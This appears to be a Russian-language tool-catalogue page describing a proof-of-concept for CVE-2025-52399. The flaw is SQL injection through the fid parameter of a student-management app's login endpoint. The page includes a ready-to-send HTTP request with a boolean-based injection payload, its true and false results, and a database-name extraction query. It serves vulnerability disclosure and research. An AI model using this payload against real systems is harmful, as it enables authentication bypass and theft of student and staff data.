Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-52399-SQLi-Institute-of-Current-Students — Эксплойт Proof-of-Concept для CVE-2025-52399, демонстрирующий SQL-инъекцию в конечной точке loginlinkfaculty Institute-of-Current-Students, обеспечивающую обход аутентификации и извлечение данных. | Kitploit
Инструменты/GitHubGitHub/userr404/cve-2025-52399-sqli-institute-of-current-students
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеСтатьи и ИсследованияОбучение и Образование
GitHubuserr404/cve-2025-52399-sqli-institute-of-current-students

CVE-2025-52399-SQLi-Institute-of-Current-Students

Эксплойт Proof-of-Concept для CVE-2025-52399, демонстрирующий SQL-инъекцию в конечной точке loginlinkfaculty Institute-of-Current-Students, обеспечивающую обход аутентификации и извлечение данных.

Репозиторий
1511 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-52399 - SQL-инъекция в Institute of Current Students

Краткое описание

Конечная точка loginlinkfaculty в приложении Institute-of-Current-Students уязвима для SQL-инъекции через POST-параметр fid. Параметр не проходит должную санитизацию перед использованием в SQL-запросе, что позволяет удалённым злоумышленникам выполнять произвольные SQL-команды.

  • Тип уязвимости: SQL-инъекция
  • Уязвимый компонент: /loginlinkfaculty (POST)
  • Уязвимый параметр: fid
  • Аутентификация: Не требуется
  • Воздействие: Обход аутентификации, извлечение данных
  • Протестировано на: Localhost
  • База данных: icsnew
  • Версия: 1.0

PoC

HTTP-запрос

root@kitploit:~
POST /Institute-of-Current-Students/loginlinkfaculty HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded

fid=-1'+OR+3*2*1=6+AND+000942=000942--&pass=example

Результат пейлоада

✅ -1' OR 3*2*1=6 AND 000942=000942 -- → ИСТИНА
❌ -1' OR 2*3=4 AND 000942=000942 -- → ЛОЖЬ

Извлечение базы данных

SELECT database(); -- возвращает 'icsnew'

Ссылки

  • CVE-2025-52399 (MITRE)
  • Уязвимое приложение
  • OWASP SQL Injection

Обнаружил

Isroil Mustafoqulov

Скачать инструмент